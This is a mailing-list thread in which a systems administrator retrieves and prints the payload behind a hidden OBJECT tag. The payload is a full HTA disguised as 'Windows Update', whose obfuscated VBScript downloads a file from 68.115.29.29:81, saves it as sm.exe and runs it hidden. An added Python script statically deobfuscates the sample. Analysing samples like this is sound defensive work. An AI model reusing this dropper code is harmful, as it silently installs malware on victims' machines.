[EMAIL PROTECTED] said:
> <html><body> <font  face="System"> <OBJECT STYLE="display:none" DATA="http://
> 68.115.29.29:81/679186.php"> </OBJECT></body></html>

> Tried to go to the site without the php file but got nothing. Appears to
> point to a home user of broadbands machine. Possibly trojaned??? Anyone got
> the guts to check out the php script? I don't! :)


Doesn't mean much to me, but here's what's there:


[EMAIL PROTECTED] owen]$ telnet 68.115.29.29 81
Trying 68.115.29.29...
Connected to 68.115.29.29.
Escape character is '^]'.

get /679186.php

HTTP/1.1 200 OK
Connection: close
Content-Type: application/hta

<HTML>
<HEAD>
<TITLE>Windows Update</TITLE>
<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" 
CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" 
SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" 
WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "q.vbs"
drte52f = "ileSyst"
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "Dim BD" & vbcrlf
TSO.write "Dim xml" & vbcrlf
TSO.write "f5j545i = ""MLH""" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://68.115.29.29:81/ukjtpxv.jpeg"";, False" & 
vbcrlf
TSO.write "xml.Send" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "BD = xml.ResponseBody" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Const adTypeBinary = 1" & vbcrlf
TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Dim BinaryStream" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf
TSO.write "A=A=A=A" & vbcrlf
TSO.write "BinaryStream.Open" & vbcrlf
TSO.write "BinaryStream.Write BD" & vbcrlf
TSO.write "b=b=b=b" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "q.vbs", 0, false
</SCRIPT>
<script>window.close()</script>
</HEAD>
</HTML>Connection closed by foreign host.

Owen


--
 Via Net.Works UK Ltd
 Local Touch Global Reach 
 Owen McShane                   Systems Administrator
 http://www.vianetworks.co.uk   Tel +44 (0)1925 484444
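
Added example, not part of the original message: a static triage pass in Python over the response captured above, which never fetches or runs anything. It unwraps the TSO.write lines into the q.vbs they would produce, folds the split string constants back into full ProgIDs, and lists the URL and file names; SAMPLE is abridged from the capture, and the function names are this example's own.

```python
import re

# Abridged from the response captured above (constructed sample, page's own text).
SAMPLE = r'''
drte52f = "ileSyst"
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")
TSO.write "f5j545i = ""MLH""" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://68.115.29.29:81/ukjtpxv.jpeg"";, False" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "q.vbs", 0, false
'''

def unwrap(text):
    """Replace each TSO.write line with the q.vbs line it would emit."""
    out = []
    for line in text.splitlines():
        m = re.match(r'\s*TSO\.write "(.*)" & vbcrlf\s*$', line, re.I)
        # Inside a VBScript string literal, "" is an escaped double quote.
        out.append(m.group(1).replace('""', '"') if m else line.strip())
    return out

def triage(text):
    """Static pass only: nothing is fetched and no script is executed."""
    lines = unwrap(text)
    # Variables assigned one string literal, e.g. drte52f = "ileSyst".
    consts = dict(m.groups() for l in lines
                  if (m := re.fullmatch(r'(\w+) = "([^"]*)"', l)))

    def fold(expr):
        # Rejoin "lit"+var+"lit"; assumes no + or & inside the literals.
        parts = [p.strip() for p in re.split(r'[+&]', expr)]
        return "".join(p[1:-1] if p.startswith('"') else consts.get(p, f"<{p}>")
                       for p in parts)

    body = "\n".join(lines)
    return {
        "progids": sorted({fold(e) for e in re.findall(r'CreateObject\(([^)]*)\)', body)}),
        "urls": sorted(set(re.findall(r'https?://[^\s"]+', body))),
        "written": re.findall(r'SaveToFile "([^"]+)"', body),
        "executed": re.findall(r'\.Run "([^"]+)"', body),
        "junk_lines": sum(bool(re.fullmatch(r'(\w)=\1=\1=\1', l)) for l in lines),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The folded ProgIDs and the count of no-op filler lines are the parts a plain string search over the raw response would miss.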
